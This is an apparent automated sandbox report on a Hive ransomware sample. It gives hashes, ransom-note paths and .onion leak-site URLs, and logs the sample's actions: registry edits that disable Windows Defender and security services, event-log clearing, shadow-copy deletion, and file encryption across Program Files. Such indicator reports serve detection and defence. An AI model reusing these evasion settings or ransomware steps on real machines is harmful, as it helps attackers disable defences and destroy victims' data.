Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 06:52
Static task
static1
Behavioral task
behavioral1
Sample
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
Resource
win10v2004-20241007-en
General
-
Target
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe
-
Size
3.3MB
-
MD5
593bd62eceeda58654db4440f104145a
-
SHA1
b1b91ca760e16a73ed089de05fde9e78fe27416d
-
SHA256
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343
-
SHA512
cc0d4f57815d0dbce6c59cf05920e93c0fa8340aad8effde3160fde2ddb3eb132d1f6a06d2f40176c7ab16c033312ac34f086f977724a47130f94e6054fc09e6
-
SSDEEP
49152:uVcQjH6VIOIgQFF3KzfKeSQSqFvVqp/kHzQJqEFH1D1Rc:uVpjK7xWF34fSQSqFvVqpcfEc
Malware Config
Extracted
C:\Program Files\Common Files\DESIGNER\wFLb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid Process 3580 wevtutil.exe 2896 wevtutil.exe 3600 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
powershell.exepowershell.exepid Process 3960 powershell.exe 4992 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exedescription ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_QpwZSR9R0gs0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\ui-strings.js.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_Zpu3Ho9xYi00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-125_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-96_altform-unplated_contrast-black.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoutilstat.etw.man.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_OednaqUHznk0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\LargeTile.scale-100.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailWideTile.scale-100.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-white_scale-125.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-down.svg.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_6zRGpOaPFuQ0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_ggujeeP4ozI0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-150.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\ui-strings.js.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_b8K4RFtVB6U0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppStoreLogo.scale-200.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg1a_thumb.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_i_9BVPKBJj80.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES\vlc.mo.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_FBbLD_wGVxs0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-256_altform-unplated_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-lightunplated.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderMedTile.contrast-black_scale-200.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode.png.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_LAL_83jz4g00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\joni.md.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_RoRiHA-Ww800.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WideTile.scale-125_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\CalculatorStoreLogo.contrast-black_scale-100.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBeLessThan.snippets.ps1xml 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_W-tU_TNykpU0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_2jX9mBtfm8U0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-200_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_Ci1fpWf8AK00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_S7cSOJ-05QM0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.png.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_VAfNx-TkZHQ0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-36_altform-unplated.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Camera_Capture.m4a 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\CamMDL2.ttf 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-125.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxMediumTile.scale-400.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_YHge3GiOir80.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-400.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\WinMetadata\Microsoft.UI.Xaml.winmd 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-80_altform-unplated_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-300.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeLargeTile.scale-200.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_dS07NjHXy180.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-200_contrast-black.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-24_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-unplated_devicefamily-colorfulunplated.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations_retina.png.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_x4JTACTbkK80.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ul-phn.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_RHIHimCmObo0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_eHRbadPno6A0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\js\url-polyfill.min.js 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxAccountsLargeTile.scale-100.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial1-pl.xrm-ms.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_D3ldXIW9pHY0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.tree.dat.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_Wwh-h3CqzJ00.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\wFLb_HOW_TO_DECRYPT.txt 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextDark.scale-125.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Acrobat_visual.svg.toNB6C2_4Mh--JmcGNxuQR7TdZiT9b_vpALfWr9tL97_cZplfkK8GhM0.euq5i 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-125_contrast-white.png 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 4276 sc.exe 4552 sc.exe 2868 sc.exe 4392 sc.exe 3512 sc.exe 4900 sc.exe 4472 sc.exe 4076 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
sc.exesc.exereg.exereg.exereg.exereg.exenet1.exenet.exewevtutil.exesc.exereg.exereg.exereg.exereg.exewevtutil.exenet1.exenet.execmd.exepowershell.exenet1.exereg.exereg.exereg.exereg.exesc.exereg.exereg.exereg.exeschtasks.exewmic.exenet.exenet.exereg.exepowershell.exe80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exereg.execmd.exesc.execmd.exereg.exereg.exereg.exesc.exereg.exeschtasks.exenet.exereg.exewevtutil.exenet1.exeschtasks.exenet1.exenet1.exenet.exeschtasks.exenet1.exereg.exesc.exereg.exereg.exeschtasks.exereg.exewmic.exenet.exesc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 80788b971747ce9edf83195f5b1ba30d951534dcff1772154fa68e38ce799343.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
